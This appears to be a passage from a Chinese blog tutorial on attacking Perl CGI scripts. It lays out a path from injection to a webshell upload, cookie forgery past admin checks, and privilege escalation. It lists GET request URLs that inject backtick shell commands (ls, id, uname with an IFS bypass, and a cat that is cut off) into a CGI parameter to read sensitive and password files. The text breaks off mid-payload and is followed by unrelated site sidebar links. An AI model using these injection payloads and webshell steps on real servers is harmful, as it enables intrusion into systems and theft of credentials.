总体思路,跳过限制,查看敏感文件和密码相关文件。
写入一句话cgi,进后台试传webshell(如果后台加验证或者MD5的时候,可以试着cookies欺骗、本地提交),寻找可执行的目录和相关函数,拿shell>提权
一、Perl 手工注入Perl脚本的漏洞大多出在open()、system()或者 ’’调用中,前者允许读写和执行,而后两个允许执行。
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET。
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
http://target.com/cgi-bin/home/news/sub.pl?`id`
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`
http://target.com/cgi-bin/home/news/sub.pl?`cat
关注
打赏
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?